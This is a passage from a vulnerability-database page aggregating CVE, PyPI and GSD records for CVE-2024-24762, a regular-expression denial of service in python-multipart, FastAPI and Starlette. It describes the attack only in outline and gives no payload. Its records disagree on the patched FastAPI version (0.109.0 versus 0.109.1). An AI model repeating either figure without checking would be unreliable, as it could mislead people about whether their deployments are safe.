cve-2024-24762

Vulnerability from cvelistv5

Published

2024-02-05 14:33

Modified

2024-08-01 23:28

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

`python-multipart` is a streaming multipart parser for Python. When using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options. An attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests, leading to regular expression denial of service. This vulnerability has been patched in version 0.0.7.

References

URL	Tags
security-advisories@github.com	https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4	Patch
security-advisories@github.com	https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p	Exploit, Vendor Advisory
security-advisories@github.com	https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74	Product
security-advisories@github.com	https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5	Patch
security-advisories@github.com	https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238	Broken Link
security-advisories@github.com	https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc	Patch
security-advisories@github.com	https://github.com/tiangolo/fastapi/releases/tag/0.109.1	Product
security-advisories@github.com	https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389	Broken Link
af854a3a-2127-422b-91ae-364da2661108	https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p	Exploit, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74	Product
af854a3a-2127-422b-91ae-364da2661108	https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238	Broken Link
af854a3a-2127-422b-91ae-364da2661108	https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/tiangolo/fastapi/releases/tag/0.109.1	Product
af854a3a-2127-422b-91ae-364da2661108	https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389	Broken Link

Impacted products

Vendor

Product

Version

▼

Kludex

python-multipart

Version: 0

	tiangolo	fastapi	Version: 0
	encode	starlette	Version: 0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-01T23:28:11.928Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p",
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p"
          },
          {
            "name": "https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4"
          },
          {
            "name": "https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389"
          },
          {
            "name": "https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238"
          },
          {
            "name": "https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74"
          },
          {
            "name": "https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5"
          },
          {
            "name": "https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc"
          },
          {
            "name": "https://github.com/tiangolo/fastapi/releases/tag/0.109.1",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/tiangolo/fastapi/releases/tag/0.109.1"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "collectionURL": "https://github.com/Kludex/python-multipart",
          "defaultStatus": "unaffected",
          "packageName": "python-multipart",
          "product": "python-multipart",
          "repo": "https://github.com/Kludex/python-multipart",
          "vendor": "Kludex",
          "versions": [
            {
              "lessThan": "0.0.7",
              "status": "affected",
              "version": "0",
              "versionType": "affected"
            }
          ]
        },
        {
          "collectionURL": "https://github.com/tiangolo/fastapi",
          "defaultStatus": "unaffected",
          "packageName": "fastapi",
          "product": "fastapi",
          "repo": "https://github.com/tiangolo/fastapi",
          "vendor": "tiangolo",
          "versions": [
            {
              "lessThan": "0.109.1",
              "status": "affected",
              "version": "0",
              "versionType": "affected"
            }
          ]
        },
        {
          "collectionURL": "https://github.com/encode/starlette",
          "defaultStatus": "unaffected",
          "packageName": "startlette",
          "product": "starlette",
          "repo": "https://github.com/encode/starlette",
          "vendor": "encode",
          "versions": [
            {
              "lessThan": "0.36.2",
              "status": "affected",
              "version": "0",
              "versionType": "affected"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "`python-multipart` is a streaming multipart parser for Python. When using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options. An attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can\u0027t handle any more requests, leading to regular expression denial of service. This vulnerability has been patched in version 0.0.7."
            }
          ],
          "value": "`python-multipart` is a streaming multipart parser for Python. When using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options. An attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can\u0027t handle any more requests, leading to regular expression denial of service. This vulnerability has been patched in version 0.0.7."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-400",
              "description": "CWE-400 Uncontrolled Resource Consumption",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-02-17T01:54:29.017Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p"
        },
        {
          "name": "https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4"
        },
        {
          "name": "https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389"
        },
        {
          "name": "https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238"
        },
        {
          "name": "https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74"
        },
        {
          "name": "https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5"
        },
        {
          "name": "https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc"
        },
        {
          "name": "https://github.com/tiangolo/fastapi/releases/tag/0.109.1",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/tiangolo/fastapi/releases/tag/0.109.1"
        }
      ],
      "source": {
        "advisory": "GHSA-2jv5-9r88-3w3p",
        "discovery": "UNKNOWN"
      },
      "title": "python-multipart vulnerable to content-type header Regular expression Denial of Service",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2024-24762",
    "datePublished": "2024-02-05T14:33:06.481Z",
    "dateReserved": "2024-01-29T20:51:26.011Z",
    "dateUpdated": "2024-08-01T23:28:11.928Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2024-24762\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-02-05T15:15:09.260\",\"lastModified\":\"2024-11-21T08:59:38.960\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"`python-multipart` is a streaming multipart parser for Python. When using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options. An attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can\u0027t handle any more requests, leading to regular expression denial of service. This vulnerability has been patched in version 0.0.7.\"},{\"lang\":\"es\",\"value\":\"FastAPI es un framework web para crear API con Python 3.8+ basado en sugerencias de tipo est\u00e1ndar de Python. Cuando se utilizan datos de formulario, `python-multipart` usa una expresi\u00f3n regular para analizar el encabezado HTTP `Content-Type`, incluidas las opciones. Un atacante podr\u00eda enviar una opci\u00f3n de \\\"Tipo de contenido\\\" personalizada que es muy dif\u00edcil de procesar para RegEx, consumiendo recursos de CPU y deteni\u00e9ndose indefinidamente (minutos o m\u00e1s) mientras se mantiene el bucle de evento principal. Esto significa que el proceso no puede manejar m\u00e1s solicitudes. Es un ReDoS (expresi\u00f3n regular de denegaci\u00f3n de servicio), solo se aplica a aquellos que leen datos del formulario usando `python-multipart`. Esta vulnerabilidad ha sido parcheada en la versi\u00f3n 0.109.0.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-400\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-1333\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:fastapiexpert:python-multipart:*:*:*:*:*:python:*:*\",\"versionEndExcluding\":\"0.0.7\",\"matchCriteriaId\":\"F446019A-4E17-401B-865F-3AD3E2EB40AD\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:fastapiexpert:python-multipart:*:*:*:*:*:python:*:*\",\"versionEndExcluding\":\"0.0.7\",\"matchCriteriaId\":\"F446019A-4E17-401B-865F-3AD3E2EB40AD\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:a:encode:starlette:*:*:*:*:*:python:*:*\",\"versionEndExcluding\":\"0.36.2\",\"matchCriteriaId\":\"DE3FCFFD-84C3-4AF4-80CF-2FB38B78D1E0\"},{\"vulnerable\":false,\"criteria\":\"cpe:2.3:a:tiangolo:fastapi:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"0.109.1\",\"matchCriteriaId\":\"8B47D84E-D97C-4E52-91AE-270FCFA34800\"}]}]}],\"references\":[{\"url\":\"https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Broken Link\"]},{\"url\":\"https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/tiangolo/fastapi/releases/tag/0.109.1\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Broken Link\"]},{\"url\":\"https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Broken Link\"]},{\"url\":\"https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/tiangolo/fastapi/releases/tag/0.109.1\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Broken Link\"]}]}}"
  }
}

pysec-2024-38

Vulnerability from pysec

Published

2024-02-05 15:15

Modified

2024-02-16 18:22

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Details

FastAPI is a web framework for building APIs with Python 3.8+ based on standard Python type hints. When using form data, python-multipart uses a Regular Expression to parse the HTTP Content-Type header, including options. An attacker could send a custom-made Content-Type option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests. It's a ReDoS(Regular expression Denial of Service), it only applies to those reading form data, using python-multipart. This vulnerability has been patched in version 0.109.1.

Aliases

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "fastapi",
        "purl": "pkg:pypi/fastapi"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc"
            }
          ],
          "repo": "https://github.com/tiangolo/fastapi",
          "type": "GIT"
        },
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.109.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "0.1.0",
        "0.1.10",
        "0.1.11",
        "0.1.12",
        "0.1.13",
        "0.1.14",
        "0.1.15",
        "0.1.16",
        "0.1.17",
        "0.1.18",
        "0.1.19",
        "0.1.2",
        "0.1.3",
        "0.1.4",
        "0.1.5",
        "0.1.6",
        "0.1.7",
        "0.1.8",
        "0.1.9",
        "0.10.0",
        "0.10.1",
        "0.10.2",
        "0.100.0",
        "0.100.0b1",
        "0.100.0b2",
        "0.100.0b3",
        "0.100.1",
        "0.101.0",
        "0.101.1",
        "0.102.0",
        "0.103.0",
        "0.103.1",
        "0.103.2",
        "0.104.0",
        "0.104.1",
        "0.105.0",
        "0.106.0",
        "0.107.0",
        "0.108.0",
        "0.109.0",
        "0.11.0",
        "0.12.0",
        "0.12.1",
        "0.13.0",
        "0.14.0",
        "0.15.0",
        "0.16.0",
        "0.17.0",
        "0.18.0",
        "0.19.0",
        "0.2.0",
        "0.2.1",
        "0.20.0",
        "0.20.1",
        "0.21.0",
        "0.22.0",
        "0.23.0",
        "0.24.0",
        "0.25.0",
        "0.26.0",
        "0.27.0",
        "0.27.1",
        "0.27.2",
        "0.28.0",
        "0.29.0",
        "0.29.1",
        "0.3.0",
        "0.30.0",
        "0.30.1",
        "0.31.0",
        "0.32.0",
        "0.33.0",
        "0.34.0",
        "0.35.0",
        "0.36.0",
        "0.37.0",
        "0.38.0",
        "0.38.1",
        "0.39.0",
        "0.4.0",
        "0.40.0",
        "0.41.0",
        "0.42.0",
        "0.43.0",
        "0.44.0",
        "0.44.1",
        "0.45.0",
        "0.46.0",
        "0.47.0",
        "0.47.1",
        "0.48.0",
        "0.49.0",
        "0.49.1",
        "0.49.2",
        "0.5.0",
        "0.5.1",
        "0.50.0",
        "0.51.0",
        "0.52.0",
        "0.53.0",
        "0.53.1",
        "0.53.2",
        "0.54.0",
        "0.54.1",
        "0.54.2",
        "0.55.0",
        "0.55.1",
        "0.56.0",
        "0.56.1",
        "0.57.0",
        "0.58.0",
        "0.58.1",
        "0.59.0",
        "0.6.0",
        "0.6.1",
        "0.6.2",
        "0.6.3",
        "0.6.4",
        "0.60.0",
        "0.60.1",
        "0.60.2",
        "0.61.0",
        "0.61.1",
        "0.61.2",
        "0.62.0",
        "0.63.0",
        "0.64.0",
        "0.65.0",
        "0.65.1",
        "0.65.2",
        "0.65.3",
        "0.66.0",
        "0.66.1",
        "0.67.0",
        "0.68.0",
        "0.68.1",
        "0.68.2",
        "0.69.0",
        "0.7.0",
        "0.7.1",
        "0.70.0",
        "0.70.1",
        "0.71.0",
        "0.72.0",
        "0.73.0",
        "0.74.0",
        "0.74.1",
        "0.75.0",
        "0.75.1",
        "0.75.2",
        "0.76.0",
        "0.77.0",
        "0.77.1",
        "0.78.0",
        "0.79.0",
        "0.79.1",
        "0.8.0",
        "0.80.0",
        "0.81.0",
        "0.82.0",
        "0.83.0",
        "0.84.0",
        "0.85.0",
        "0.85.1",
        "0.85.2",
        "0.86.0",
        "0.87.0",
        "0.88.0",
        "0.89.0",
        "0.89.1",
        "0.9.0",
        "0.9.1",
        "0.90.0",
        "0.90.1",
        "0.91.0",
        "0.92.0",
        "0.93.0",
        "0.94.0",
        "0.94.1",
        "0.95.0",
        "0.95.1",
        "0.95.2",
        "0.96.0",
        "0.96.1",
        "0.97.0",
        "0.98.0",
        "0.99.0",
        "0.99.1"
      ]
    }
  ],
  "aliases": [
    "CVE-2024-24762",
    "GHSA-qf9m-vfgh-m389"
  ],
  "details": "FastAPI is a web framework for building APIs with Python 3.8+ based on standard Python type hints. When using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options. An attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can\u0027t handle any more requests. It\u0027s a ReDoS(Regular expression Denial of Service), it only applies to those reading form data, using `python-multipart`. This vulnerability has been patched in version 0.109.1.",
  "id": "PYSEC-2024-38",
  "modified": "2024-02-16T18:22:32.607118+00:00",
  "published": "2024-02-05T15:15:00+00:00",
  "references": [
    {
      "type": "EVIDENCE",
      "url": "https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389"
    },
    {
      "type": "FIX",
      "url": "https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc"
    },
    {
      "type": "WEB",
      "url": "https://github.com/tiangolo/fastapi/releases/tag/0.109.1"
    }
  ],
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

gsd-2024-24762

Vulnerability from gsd

Modified

2024-01-30 06:03

Details

FastAPI is a web framework for building APIs with Python 3.8+ based on standard Python type hints. When using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options. An attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests. It's a ReDoS(Regular expression Denial of Service), it only applies to those reading form data, using `python-multipart`. This vulnerability has been patched in version 0.109.0.

Aliases

CVE-2024-24762

JSON

To clipboard

{
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2024-24762"
      ],
      "details": "FastAPI is a web framework for building APIs with Python 3.8+ based on standard Python type hints. When using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options. An attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can\u0027t handle any more requests. It\u0027s a ReDoS(Regular expression Denial of Service), it only applies to those reading form data, using `python-multipart`. This vulnerability has been patched in version 0.109.0.",
      "id": "GSD-2024-24762",
      "modified": "2024-01-30T06:03:12.565837Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "security-advisories@github.com",
        "ID": "CVE-2024-24762",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "python-multipart",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "\u003c",
                          "version_name": "0",
                          "version_value": "0.0.7"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "Kludex"
            },
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "fastapi",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "\u003c",
                          "version_name": "0",
                          "version_value": "0.109.1"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "tiangolo"
            },
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "starlette",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "\u003c",
                          "version_name": "0",
                          "version_value": "0.36.2"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "encode"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "`python-multipart` is a streaming multipart parser for Python. When using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options. An attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can\u0027t handle any more requests, leading to regular expression denial of service. This vulnerability has been patched in version 0.0.7."
          }
        ]
      },
      "generator": {
        "engine": "Vulnogram 0.1.0-dev"
      },
      "impact": {
        "cvss": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "cweId": "CWE-400",
                "lang": "eng",
                "value": "CWE-400 Uncontrolled Resource Consumption"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p",
            "refsource": "MISC",
            "url": "https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p"
          },
          {
            "name": "https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4",
            "refsource": "MISC",
            "url": "https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4"
          },
          {
            "name": "https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389",
            "refsource": "MISC",
            "url": "https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389"
          },
          {
            "name": "https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238",
            "refsource": "MISC",
            "url": "https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238"
          },
          {
            "name": "https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74",
            "refsource": "MISC",
            "url": "https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74"
          },
          {
            "name": "https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5",
            "refsource": "MISC",
            "url": "https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5"
          },
          {
            "name": "https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc",
            "refsource": "MISC",
